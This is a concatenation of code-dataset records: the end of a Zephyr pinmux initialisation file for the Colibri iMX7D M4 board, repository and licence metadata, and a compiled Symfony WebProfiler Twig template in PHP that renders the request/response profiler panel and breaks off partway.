		IOMUXC_SW_PAD_CTL_PAD_UART2_RX_DATA_PS(3) |
		IOMUXC_SW_PAD_CTL_PAD_UART2_RX_DATA_HYS_MASK |
		IOMUXC_SW_PAD_CTL_PAD_UART2_RX_DATA_DSE(0);

	IOMUXC_SW_PAD_CTL_PAD_UART2_TX_DATA =
		IOMUXC_SW_PAD_CTL_PAD_UART2_TX_DATA_PE_MASK |
		IOMUXC_SW_PAD_CTL_PAD_UART2_TX_DATA_PS(3) |
		IOMUXC_SW_PAD_CTL_PAD_UART2_RX_DATA_HYS_MASK |
		IOMUXC_SW_PAD_CTL_PAD_UART2_TX_DATA_DSE(0);

	/* Select TX_PAD for RX data (DTE mode...) */
	IOMUXC_UART2_RX_DATA_SELECT_INPUT =
		IOMUXC_UART2_RX_DATA_SELECT_INPUT_DAISY(3);
#endif

#if DT_NODE_HAS_STATUS(DT_NODELABEL(i2c1), okay)
	/* I2C1 SCL/SDA: mux mode 0 with SION so the input path stays active */
	IOMUXC_SW_MUX_CTL_PAD_I2C1_SCL =
		IOMUXC_SW_MUX_CTL_PAD_I2C1_SCL_MUX_MODE(0) |
		IOMUXC_SW_MUX_CTL_PAD_I2C1_SCL_SION_MASK;
	IOMUXC_SW_MUX_CTL_PAD_I2C1_SDA =
		IOMUXC_SW_MUX_CTL_PAD_I2C1_SDA_MUX_MODE(0) |
		IOMUXC_SW_MUX_CTL_PAD_I2C1_SDA_SION_MASK;

	IOMUXC_I2C1_SCL_SELECT_INPUT = IOMUXC_I2C1_SCL_SELECT_INPUT_DAISY(1);
	IOMUXC_I2C1_SDA_SELECT_INPUT = IOMUXC_I2C1_SDA_SELECT_INPUT_DAISY(1);

	IOMUXC_SW_PAD_CTL_PAD_I2C1_SCL =
		IOMUXC_SW_PAD_CTL_PAD_I2C1_SCL_PE_MASK |
		IOMUXC_SW_PAD_CTL_PAD_I2C1_SCL_PS(3) |
		IOMUXC_SW_PAD_CTL_PAD_I2C1_SCL_DSE(0) |
		IOMUXC_SW_PAD_CTL_PAD_I2C1_SCL_HYS_MASK;

	IOMUXC_SW_PAD_CTL_PAD_I2C1_SDA =
		IOMUXC_SW_PAD_CTL_PAD_I2C1_SDA_PE_MASK |
		IOMUXC_SW_PAD_CTL_PAD_I2C1_SDA_PS(3) |
		IOMUXC_SW_PAD_CTL_PAD_I2C1_SDA_DSE(0) |
		IOMUXC_SW_PAD_CTL_PAD_I2C1_SDA_HYS_MASK;
#endif

#if DT_NODE_HAS_STATUS(DT_NODELABEL(i2c2), okay)
	/* I2C2 SCL/SDA: same pattern as I2C1 */
	IOMUXC_SW_MUX_CTL_PAD_I2C2_SCL =
		IOMUXC_SW_MUX_CTL_PAD_I2C2_SCL_MUX_MODE(0) |
		IOMUXC_SW_MUX_CTL_PAD_I2C2_SCL_SION_MASK;
	IOMUXC_SW_MUX_CTL_PAD_I2C2_SDA =
		IOMUXC_SW_MUX_CTL_PAD_I2C2_SDA_MUX_MODE(0) |
		IOMUXC_SW_MUX_CTL_PAD_I2C2_SDA_SION_MASK;

	IOMUXC_I2C2_SCL_SELECT_INPUT = IOMUXC_I2C2_SCL_SELECT_INPUT_DAISY(1);
	IOMUXC_I2C2_SDA_SELECT_INPUT = IOMUXC_I2C2_SDA_SELECT_INPUT_DAISY(1);

	IOMUXC_SW_PAD_CTL_PAD_I2C2_SCL =
		IOMUXC_SW_PAD_CTL_PAD_I2C2_SCL_PE_MASK |
		IOMUXC_SW_PAD_CTL_PAD_I2C2_SCL_PS(3) |
		IOMUXC_SW_PAD_CTL_PAD_I2C2_SCL_DSE(0) |
		IOMUXC_SW_PAD_CTL_PAD_I2C2_SCL_HYS_MASK;

	IOMUXC_SW_PAD_CTL_PAD_I2C2_SDA =
		IOMUXC_SW_PAD_CTL_PAD_I2C2_SDA_PE_MASK |
		IOMUXC_SW_PAD_CTL_PAD_I2C2_SDA_PS(3) |
		IOMUXC_SW_PAD_CTL_PAD_I2C2_SDA_DSE(0) |
		IOMUXC_SW_PAD_CTL_PAD_I2C2_SDA_HYS_MASK;
#endif

#if DT_NODE_HAS_STATUS(DT_NODELABEL(i2c3), okay)
	/* I2C3 SCL/SDA: same pattern, daisy-chain input selector 2 */
	IOMUXC_SW_MUX_CTL_PAD_I2C3_SCL =
		IOMUXC_SW_MUX_CTL_PAD_I2C3_SCL_MUX_MODE(0) |
		IOMUXC_SW_MUX_CTL_PAD_I2C3_SCL_SION_MASK;
	IOMUXC_SW_MUX_CTL_PAD_I2C3_SDA =
		IOMUXC_SW_MUX_CTL_PAD_I2C3_SDA_MUX_MODE(0) |
		IOMUXC_SW_MUX_CTL_PAD_I2C3_SDA_SION_MASK;

	IOMUXC_I2C3_SCL_SELECT_INPUT = IOMUXC_I2C3_SCL_SELECT_INPUT_DAISY(2);
	IOMUXC_I2C3_SDA_SELECT_INPUT = IOMUXC_I2C3_SDA_SELECT_INPUT_DAISY(2);

	IOMUXC_SW_PAD_CTL_PAD_I2C3_SCL =
		IOMUXC_SW_PAD_CTL_PAD_I2C3_SCL_PE_MASK |
		IOMUXC_SW_PAD_CTL_PAD_I2C3_SCL_PS(3) |
		IOMUXC_SW_PAD_CTL_PAD_I2C3_SCL_DSE(0) |
		IOMUXC_SW_PAD_CTL_PAD_I2C3_SCL_HYS_MASK;

	IOMUXC_SW_PAD_CTL_PAD_I2C3_SDA =
		IOMUXC_SW_PAD_CTL_PAD_I2C3_SDA_PE_MASK |
		IOMUXC_SW_PAD_CTL_PAD_I2C3_SDA_PS(3) |
		IOMUXC_SW_PAD_CTL_PAD_I2C3_SDA_DSE(0) |
		IOMUXC_SW_PAD_CTL_PAD_I2C3_SDA_HYS_MASK;
#endif

#if DT_NODE_HAS_STATUS(DT_NODELABEL(i2c4), okay)
	/* I2C4 is routed over the ENET1 RGMII TD2/TD3 pads (mux mode 3) */
	IOMUXC_SW_MUX_CTL_PAD_ENET1_RGMII_TD2 =
		IOMUXC_SW_MUX_CTL_PAD_ENET1_RGMII_TD2_MUX_MODE(3) |
		IOMUXC_SW_MUX_CTL_PAD_ENET1_RGMII_TD2_SION_MASK;
	IOMUXC_SW_MUX_CTL_PAD_ENET1_RGMII_TD3 =
		IOMUXC_SW_MUX_CTL_PAD_ENET1_RGMII_TD3_MUX_MODE(3) |
		IOMUXC_SW_MUX_CTL_PAD_ENET1_RGMII_TD3_SION_MASK;

	IOMUXC_I2C4_SCL_SELECT_INPUT = IOMUXC_I2C4_SCL_SELECT_INPUT_DAISY(4);
	IOMUXC_I2C4_SDA_SELECT_INPUT = IOMUXC_I2C4_SDA_SELECT_INPUT_DAISY(4);

	IOMUXC_SW_PAD_CTL_PAD_ENET1_RGMII_TD2 =
		IOMUXC_SW_PAD_CTL_PAD_ENET1_RGMII_TD2_PE_MASK |
		IOMUXC_SW_PAD_CTL_PAD_ENET1_RGMII_TD2_PS(1) |
		IOMUXC_SW_PAD_CTL_PAD_ENET1_RGMII_TD2_DSE(0) |
		IOMUXC_SW_PAD_CTL_PAD_ENET1_RGMII_TD2_HYS_MASK;

	IOMUXC_SW_PAD_CTL_PAD_ENET1_RGMII_TD3 =
		IOMUXC_SW_PAD_CTL_PAD_ENET1_RGMII_TD3_PE_MASK |
		IOMUXC_SW_PAD_CTL_PAD_ENET1_RGMII_TD3_PS(1) |
		IOMUXC_SW_PAD_CTL_PAD_ENET1_RGMII_TD3_DSE(0) |
		IOMUXC_SW_PAD_CTL_PAD_ENET1_RGMII_TD3_HYS_MASK;
#endif

#if DT_NODE_HAS_STATUS(DT_NODELABEL(pwm1), okay)
	/* PWM1 on GPIO1_IO08, mux mode 7 */
	IOMUXC_SW_MUX_CTL_PAD_GPIO1_IO08 =
		IOMUXC_SW_MUX_CTL_PAD_GPIO1_IO08_MUX_MODE(7);
	IOMUXC_SW_PAD_CTL_PAD_GPIO1_IO08 =
		IOMUXC_SW_PAD_CTL_PAD_GPIO1_IO08_PE_MASK |
		IOMUXC_SW_PAD_CTL_PAD_GPIO1_IO08_PS(3) |
		IOMUXC_SW_PAD_CTL_PAD_GPIO1_IO08_DSE(0) |
		IOMUXC_SW_PAD_CTL_PAD_GPIO1_IO08_HYS_MASK;
#endif

#if DT_NODE_HAS_STATUS(DT_NODELABEL(pwm2), okay)
	/* PWM2 on GPIO1_IO09, mux mode 7 */
	IOMUXC_SW_MUX_CTL_PAD_GPIO1_IO09 =
		IOMUXC_SW_MUX_CTL_PAD_GPIO1_IO09_MUX_MODE(7);
	IOMUXC_SW_PAD_CTL_PAD_GPIO1_IO09 =
		IOMUXC_SW_PAD_CTL_PAD_GPIO1_IO09_PE_MASK |
		IOMUXC_SW_PAD_CTL_PAD_GPIO1_IO09_PS(3) |
		IOMUXC_SW_PAD_CTL_PAD_GPIO1_IO09_DSE(0) |
		IOMUXC_SW_PAD_CTL_PAD_GPIO1_IO09_HYS_MASK;
#endif

#if DT_NODE_HAS_STATUS(DT_NODELABEL(pwm3), okay)
	/* PWM3 on GPIO1_IO10, mux mode 7 */
	IOMUXC_SW_MUX_CTL_PAD_GPIO1_IO10 =
		IOMUXC_SW_MUX_CTL_PAD_GPIO1_IO10_MUX_MODE(7);
	IOMUXC_SW_PAD_CTL_PAD_GPIO1_IO10 =
		IOMUXC_SW_PAD_CTL_PAD_GPIO1_IO10_PE_MASK |
		IOMUXC_SW_PAD_CTL_PAD_GPIO1_IO10_PS(3) |
		IOMUXC_SW_PAD_CTL_PAD_GPIO1_IO10_DSE(0) |
		IOMUXC_SW_PAD_CTL_PAD_GPIO1_IO10_HYS_MASK;
#endif

#if DT_NODE_HAS_STATUS(DT_NODELABEL(pwm4), okay)
	/* PWM4 on GPIO1_IO11, mux mode 7 */
	IOMUXC_SW_MUX_CTL_PAD_GPIO1_IO11 =
		IOMUXC_SW_MUX_CTL_PAD_GPIO1_IO11_MUX_MODE(7);
	IOMUXC_SW_PAD_CTL_PAD_GPIO1_IO11 =
		IOMUXC_SW_PAD_CTL_PAD_GPIO1_IO11_PE_MASK |
		IOMUXC_SW_PAD_CTL_PAD_GPIO1_IO11_PS(3) |
		IOMUXC_SW_PAD_CTL_PAD_GPIO1_IO11_DSE(0) |
		IOMUXC_SW_PAD_CTL_PAD_GPIO1_IO11_HYS_MASK;
#endif

	return 0;
}
SYS_INIT(colibri_imx7d_m4_pinmux_init, PRE_KERNEL_1, 0);
|
C
|
Apache-2.0
|
MarekPorwisz/sdk-zephyr/boards/arm/colibri_imx7d_m4/pinmux.c
|
c35cf66d-cb06-4a7d-bae2-abb0bb8a4b74
|
[{"tag": "NAME", "value": "Diego Sueiro", "start": 26, "end": 38, "context": "/*\n * Copyright (c) 2018, Diego Sueiro <diego.sueiro@gmail.com>\n *\n * SPDX-License-Ident"}, {"tag": "EMAIL", "value": "diego.sueiro@gmail.com", "start": 40, "end": 62, "context": "/*\n * Copyright (c) 2018, Diego Sueiro <diego.sueiro@gmail.com>\n *\n * SPDX-License-Identifier: Apache-2.0\n */\n\n#"}]
|
[{"tag": "NAME", "value": "Diego Sueiro", "start": 26, "end": 38, "context": "/*\n * Copyright (c) 2018, Diego Sueiro <diego.sueiro@gmail.com>\n *\n * SPDX-License-Ident"}, {"tag": "EMAIL", "value": "diego.sueiro@gmail.com", "start": 40, "end": 62, "context": "/*\n * Copyright (c) 2018, Diego Sueiro <diego.sueiro@gmail.com>\n *\n * SPDX-License-Identifier: Apache-2.0\n */\n\n#"}]
|
<?php
/* @WebProfiler/Collector/request.html.twig */
class __TwigTemplate_54ae96fc6f0720df0c63e5050337569a47d5590cfb054fa89dafdd68877aad9d extends Twig_Template
{
    public function __construct(Twig_Environment $env)
    {
        parent::__construct($env);

        // line 1
        // Compiled Twig template cache: eagerly resolve the parent layout
        // template and register the blocks this template overrides.
        $this->parent = $this->loadTemplate("@WebProfiler/Profiler/layout.html.twig", "@WebProfiler/Collector/request.html.twig", 1);
        $this->blocks = array(
            'toolbar' => array($this, 'block_toolbar'),
            'menu' => array($this, 'block_menu'),
            'panel' => array($this, 'block_panel'),
        );
    }
    protected function doGetParent(array $context)
    {
        // The parent template is static for this compiled template.
        return "@WebProfiler/Profiler/layout.html.twig";
    }
    protected function doDisplay(array $context, array $blocks = array())
    {
        // Wrap the render of the parent template (with this template's
        // blocks merged in) in a native_profiler enter/leave pair.
        $__internal_a2d27283249ac527c793dff82643065cf57bd428df8d4dc250d06071d7eac723 = $this->env->getExtension("native_profiler");
        $__internal_a2d27283249ac527c793dff82643065cf57bd428df8d4dc250d06071d7eac723->enter($__internal_a2d27283249ac527c793dff82643065cf57bd428df8d4dc250d06071d7eac723_prof = new Twig_Profiler_Profile($this->getTemplateName(), "template", "@WebProfiler/Collector/request.html.twig"));

        $this->parent->display($context, array_merge($this->blocks, $blocks));

        $__internal_a2d27283249ac527c793dff82643065cf57bd428df8d4dc250d06071d7eac723->leave($__internal_a2d27283249ac527c793dff82643065cf57bd428df8d4dc250d06071d7eac723_prof);
    }
// line 3
public function block_toolbar($context, array $blocks = array())
{
$__internal_820128d1d88c12e4b8fde3a93c60ac7d3467be36f811db26944129bbb13d47d8 = $this->env->getExtension("native_profiler");
$__internal_820128d1d88c12e4b8fde3a93c60ac7d3467be36f811db26944129bbb13d47d8->enter($__internal_820128d1d88c12e4b8fde3a93c60ac7d3467be36f811db26944129bbb13d47d8_prof = new Twig_Profiler_Profile($this->getTemplateName(), "block", "toolbar"));
// line 4
echo " ";
ob_start();
// line 5
echo " ";
if ($this->getAttribute($this->getAttribute((isset($context["collector"]) ? $context["collector"] : null), "controller", array(), "any", false, true), "class", array(), "any", true, true)) {
// line 6
echo " ";
$context["link"] = $this->env->getExtension('code')->getFileLink($this->getAttribute($this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "controller", array()), "file", array()), $this->getAttribute($this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "controller", array()), "line", array()));
// line 7
echo " ";
if ((isset($context["link"]) ? $context["link"] : $this->getContext($context, "link"))) {
echo "<a href=\"";
echo twig_escape_filter($this->env, (isset($context["link"]) ? $context["link"] : $this->getContext($context, "link")), "html", null, true);
echo "\" title=\"";
echo twig_escape_filter($this->env, $this->getAttribute($this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "controller", array()), "file", array()), "html", null, true);
echo "\">";
} else {
echo "<span>";
}
// line 8
echo "
";
// line 9
echo twig_escape_filter($this->env, strip_tags($this->env->getExtension('code')->abbrClass($this->getAttribute($this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "controller", array()), "class", array()))), "html", null, true);
// line 11
if ($this->getAttribute($this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "controller", array()), "method", array())) {
// line 12
echo " :: ";
echo twig_escape_filter($this->env, $this->getAttribute($this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "controller", array()), "method", array()), "html", null, true);
}
// line 15
if ((isset($context["link"]) ? $context["link"] : $this->getContext($context, "link"))) {
echo "</a>";
} else {
echo "</span>";
}
// line 16
echo " ";
} else {
// line 17
echo " <span>";
echo twig_escape_filter($this->env, $this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "controller", array()), "html", null, true);
echo "</span>
";
}
// line 19
echo " ";
$context["request_handler"] = ('' === $tmp = ob_get_clean()) ? '' : new Twig_Markup($tmp, $this->env->getCharset());
// line 20
echo "
";
// line 21
$context["request_status_code_color"] = ((($this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "statuscode", array()) >= 400)) ? ("red") : (((($this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "statuscode", array()) >= 300)) ? ("yellow") : ("green"))));
// line 22
echo "
";
// line 23
ob_start();
// line 24
echo " <span class=\"sf-toolbar-status sf-toolbar-status-";
echo twig_escape_filter($this->env, (isset($context["request_status_code_color"]) ? $context["request_status_code_color"] : $this->getContext($context, "request_status_code_color")), "html", null, true);
echo "\">";
echo twig_escape_filter($this->env, $this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "statuscode", array()), "html", null, true);
echo "</span>
";
// line 25
if ($this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "route", array())) {
// line 26
echo " <span class=\"sf-toolbar-label\">@</span>
<span class=\"sf-toolbar-value sf-toolbar-info-piece-additional\">";
// line 27
echo twig_escape_filter($this->env, $this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "route", array()), "html", null, true);
echo "</span>
";
}
// line 29
echo " ";
$context["icon"] = ('' === $tmp = ob_get_clean()) ? '' : new Twig_Markup($tmp, $this->env->getCharset());
// line 30
echo "
";
// line 31
ob_start();
// line 32
echo " <div class=\"sf-toolbar-info-piece\">
<b>HTTP status</b>
<span>";
// line 34
echo twig_escape_filter($this->env, $this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "statuscode", array()), "html", null, true);
echo " ";
echo twig_escape_filter($this->env, $this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "statustext", array()), "html", null, true);
echo "</span>
</div>
<div class=\"sf-toolbar-info-piece\">
<b>Controller</b>
<span>";
// line 39
echo twig_escape_filter($this->env, (isset($context["request_handler"]) ? $context["request_handler"] : $this->getContext($context, "request_handler")), "html", null, true);
echo "</span>
</div>
";
// line 42
if ($this->getAttribute($this->getAttribute((isset($context["collector"]) ? $context["collector"] : null), "controller", array(), "any", false, true), "class", array(), "any", true, true)) {
// line 43
echo " <div class=\"sf-toolbar-info-piece\">
<b>Controller class</b>
<span>";
// line 45
echo twig_escape_filter($this->env, $this->getAttribute($this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "controller", array()), "class", array()), "html", null, true);
echo "</span>
</div>
";
}
// line 48
echo "
<div class=\"sf-toolbar-info-piece\">
<b>Route name</b>
<span>";
// line 51
echo twig_escape_filter($this->env, (($this->getAttribute((isset($context["collector"]) ? $context["collector"] : null), "route", array(), "any", true, true)) ? (_twig_default_filter($this->getAttribute((isset($context["collector"]) ? $context["collector"] : null), "route", array()), "NONE")) : ("NONE")), "html", null, true);
echo "</span>
</div>
<div class=\"sf-toolbar-info-piece\">
<b>Has session</b>
<span>";
// line 56
if (twig_length_filter($this->env, $this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "sessionmetadata", array()))) {
echo "yes";
} else {
echo "no";
}
echo "</span>
</div>
";
$context["text"] = ('' === $tmp = ob_get_clean()) ? '' : new Twig_Markup($tmp, $this->env->getCharset());
// line 59
echo "
";
// line 60
echo twig_include($this->env, $context, "@WebProfiler/Profiler/toolbar_item.html.twig", array("link" => (isset($context["profiler_url"]) ? $context["profiler_url"] : $this->getContext($context, "profiler_url"))));
echo "
";
$__internal_820128d1d88c12e4b8fde3a93c60ac7d3467be36f811db26944129bbb13d47d8->leave($__internal_820128d1d88c12e4b8fde3a93c60ac7d3467be36f811db26944129bbb13d47d8_prof);
}
// line 63
public function block_menu($context, array $blocks = array())
{
$__internal_8ec6c75c9011a9771c6292f985ecfb037ed67c2c4472b38bc260400acf9dc895 = $this->env->getExtension("native_profiler");
$__internal_8ec6c75c9011a9771c6292f985ecfb037ed67c2c4472b38bc260400acf9dc895->enter($__internal_8ec6c75c9011a9771c6292f985ecfb037ed67c2c4472b38bc260400acf9dc895_prof = new Twig_Profiler_Profile($this->getTemplateName(), "block", "menu"));
// line 64
echo " <span class=\"label\">
<span class=\"icon\">";
// line 65
echo twig_include($this->env, $context, "@WebProfiler/Icon/request.svg");
echo "</span>
<strong>Request / Response</strong>
</span>
";
$__internal_8ec6c75c9011a9771c6292f985ecfb037ed67c2c4472b38bc260400acf9dc895->leave($__internal_8ec6c75c9011a9771c6292f985ecfb037ed67c2c4472b38bc260400acf9dc895_prof);
}
// line 70
public function block_panel($context, array $blocks = array())
{
$__internal_623d89ee401d94928375fd08ad0031816f48dfd5b8676b9f48dbe4e6b972aeb5 = $this->env->getExtension("native_profiler");
$__internal_623d89ee401d94928375fd08ad0031816f48dfd5b8676b9f48dbe4e6b972aeb5->enter($__internal_623d89ee401d94928375fd08ad0031816f48dfd5b8676b9f48dbe4e6b972aeb5_prof = new Twig_Profiler_Profile($this->getTemplateName(), "block", "panel"));
// line 71
echo " <div class=\"sf-tabs\">
<div class=\"tab\">
<h3 class=\"tab-title\">Request</h3>
<div class=\"tab-content\">
<h3>GET Parameters</h3>
";
// line 78
if (twig_test_empty($this->getAttribute($this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "requestquery", array()), "all", array()))) {
// line 79
echo " <div class=\"empty\">
<p>No GET parameters</p>
</div>
";
} else {
// line 83
echo " ";
echo twig_include($this->env, $context, "@WebProfiler/Profiler/bag.html.twig", array("bag" => $this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "requestquery", array())), false);
echo "
";
}
// line 85
echo "
<h3>POST Parameters</h3>
";
// line 88
if (twig_test_empty($this->getAttribute($this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "requestrequest", array()), "all", array()))) {
// line 89
echo " <div class=\"empty\">
<p>No POST parameters</p>
</div>
";
} else {
// line 93
echo " ";
echo twig_include($this->env, $context, "@WebProfiler/Profiler/bag.html.twig", array("bag" => $this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "requestrequest", array())), false);
echo "
";
}
// line 95
echo "
<h3>Request Attributes</h3>
";
// line 98
if (twig_test_empty($this->getAttribute($this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "requestattributes", array()), "all", array()))) {
// line 99
echo " <div class=\"empty\">
<p>No attributes</p>
</div>
";
} else {
// line 103
echo " ";
echo twig_include($this->env, $context, "@WebProfiler/Profiler/bag.html.twig", array("bag" => $this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "requestattributes", array())), false);
echo "
";
}
// line 105
echo "
<h3>Cookies</h3>
";
// line 108
if (twig_test_empty($this->getAttribute($this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "requestcookies", array()), "all", array()))) {
// line 109
echo " <div class=\"empty\">
<p>No cookies</p>
</div>
";
} else {
// line 113
echo " ";
echo twig_include($this->env, $context, "@WebProfiler/Profiler/bag.html.twig", array("bag" => $this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "requestcookies", array())), false);
echo "
";
}
// line 115
echo "
<h3>Request Headers</h3>
";
// line 117
echo twig_include($this->env, $context, "@WebProfiler/Profiler/bag.html.twig", array("bag" => $this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "requestheaders", array()), "labels" => array(0 => "Header", 1 => "Value")), false);
echo "
<h3>Request Content</h3>
";
// line 121
if (($this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "content", array()) == false)) {
// line 122
echo " <div class=\"empty\">
<p>Request content not available (it was retrieved as a resource).</p>
</div>
";
} elseif ($this->getAttribute( // line 125
(isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "content", array())) {
// line 126
echo " <div class=\"card\">
<pre class=\"break-long-words\">";
// line 127
echo twig_escape_filter($this->env, $this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "content", array()), "html", null, true);
echo "</pre>
</div>
";
} else {
// line 130
echo " <div class=\"empty\">
<p>No content</p>
</div>
";
}
// line 134
echo "
<h3>Server Parameters</h3>
";
// line 136
echo twig_include($this->env, $context, "@WebProfiler/Profiler/bag.html.twig", array("bag" => $this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "requestserver", array())), false);
echo "
</div>
</div>
<div class=\"tab\">
<h3 class=\"tab-title\">Response</h3>
<div class=\"tab-content\">
<h3>Response Headers</h3>
";
// line 146
echo twig_include($this->env, $context, "@WebProfiler/Profiler/bag.html.twig", array("bag" => $this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "responseheaders", array()), "labels" => array(0 => "Header", 1 => "Value")), false);
echo "
</div>
</div>
<div class=\"tab ";
// line 150
echo ((twig_test_empty($this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "sessionmetadata", array()))) ? ("disabled") : (""));
echo "\">
<h3 class=\"tab-title\">Session</h3>
<div class=\"tab-content\">
<h3>Session Metadata</h3>
";
// line 156
if (twig_test_empty($this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "sessionmetadata", array()))) {
// line 157
echo " <div class=\"empty\">
<p>No session metadata</p>
</div>
";
} else {
// line 161
echo " ";
echo twig_include($this->env, $context, "@WebProfiler/Profiler/table.html.twig", array("data" => $this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "sessionmetadata", array())), false);
echo "
";
}
// line 163
echo "
<h3>Session Attributes</h3>
";
// line 166
if (twig_test_empty($this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "sessionattributes", array()))) {
// line 167
echo " <div class=\"empty\">
<p>No session attributes</p>
</div>
";
} else {
// line 171
echo " ";
echo twig_include($this->env, $context, "@WebProfiler/Profiler/table.html.twig", array("data" => $this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "sessionattributes", array()), "labels" => array(0 => "Attribute", 1 => "Value")), false);
echo "
";
}
// line 173
echo " </div>
</div>
<div class=\"tab ";
// line 176
echo ((twig_test_empty($this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "flashes", array()))) ? ("disabled") : (""));
echo "\">
<h3 class=\"tab-title\">Flashes</h3>
<div class=\"tab-content\">
<h3>Flashes</h3>
";
// line 182
if (twig_test_empty($this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "flashes", array()))) {
// line 183
echo " <div class=\"empty\">
<p>No flash messages were created.</p>
</div>
";
} else {
// line 187
echo " ";
echo twig_include($this->env, $context, "@WebProfiler/Profiler/table.html.twig", array("data" => $this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "flashes", array())), false);
echo "
";
}
// line 189
echo " </div>
</div>
";
// line 192
if ($this->getAttribute((isset($context["profile"]) ? $context["profile"] : $this->getContext($context, "profile")), "parent", array())) {
// line 193
echo " <div class=\"tab\">
<h3 class=\"tab-title\">Parent Request</h3>
<div class=\"tab-content\">
<h3>
<a href=\"";
// line 198
echo twig_escape_filter($this->env, $this->env->getExtension('routing')->getPath("_profiler", array("token" => $this->getAttribute($this->getAttribute((isset($context["profile"]) ? $context["profile"] : $this->getContext($context, "profile")), "parent", array()), "token", array()))), "html", null, true);
echo "\">Return to parent request</a>
<small>(token = ";
// line 199
echo twig_escape_filter($this->env, $this->getAttribute($this->getAttribute((isset($context["profile"]) ? $context["profile"] : $this->getContext($context, "profile")), "parent", array()), "token", array()), "html", null, true);
echo ")</small>
</h3>
";
// line 202
echo twig_include($this->env, $context, "@WebProfiler/Profiler/bag.html.twig", array("bag" => $this->getAttribute($this->getAttribute($this->getAttribute((isset($context["profile"]) ? $context["profile"] : $this->getContext($context, "profile")), "parent", array()), "getcollector", array(0 => "request"), "method"), "requestattributes", array())), false);
echo "
</div>
</div>
";
}
// line 206
echo "
";
// line 207
if (twig_length_filter($this->env, $this->getAttribute((isset($context["profile"]) ? $context["profile"] : $this->getContext($context, "profile")), "children", array()))) {
// line 208
echo " <div class=\"tab\">
<h3 class=\"tab-title\">Sub Requests <span class=\"badge\">";
// line 209
echo twig_escape_filter($this->env, twig_length_filter($this->env, $this->getAttribute((isset($context["profile"]) ? $context["profile"] : $this->getContext($context, "profile")), "children", array())), "html", null, true);
echo "</span></h3>
<div class=\"tab-content\">
";
// line 212
$context['_parent'] = $context;
$context['_seq'] = twig_ensure_traversable($this->getAttribute((isset($context["profile"]) ? $context["profile"] : $this->getContext($context, "profile")), "children", array()));
foreach ($context['_seq'] as $context["_key"] => $context["child"]) {
// line 213
echo " <h3>
<a href=\"";
// line 214
echo twig_escape_filter($this->env, $this->env->getExtension('routing')->getPath("_profiler", array("token" => $this->getAttribute($context["child"], "token", array()))), "html", null, true);
echo "\">";
// line 215
echo twig_escape_filter($this->env, $this->getAttribute($this->getAttribute($this->getAttribute($context["child"], "getcollector", array(0 => "request"), "method"), "requestattributes", array()), "get", array(0 => "_controller"), "method"), "html", null, true);
// line 216
echo "</a>
<small>(token = ";
// line 217
echo twig_escape_filter($this->env, $this->getAttribute($context["child"], "token", array()), "html", null, true);
echo ")</small>
</h3>
";
// line 220
echo twig_include($this->env, $context, "@WebProfiler/Profiler/bag.html.twig", array("bag" => $this->getAttribute($this->getAttribute($context["child"], "getcollector", array(0 => "request"), "method"), "requestattributes", array())), false);
echo "
";
}
$_parent = $context['_parent'];
unset($context['_seq'], $context['_iterated'], $context['_key'], $context['child'], $context['_parent'], $context['loop']);
$context = array_intersect_key($context, $_parent) + $_parent;
// line 222
echo " </div>
</div>
";
}
// line 225
echo " </div>
";
$__internal_623d89ee401d94928375fd08ad0031816f48dfd5b8676b9f48dbe4e6b972aeb5->leave($__internal_623d89ee401d94928375fd08ad0031816f48dfd5b8676b9f48dbe4e6b972aeb5_prof);
}
public function getTemplateName()
{
return "@WebProfiler/Collector/request.html.twig";
}
public function isTraitable()
{
return false;
}
public function getDebugInfo()
{
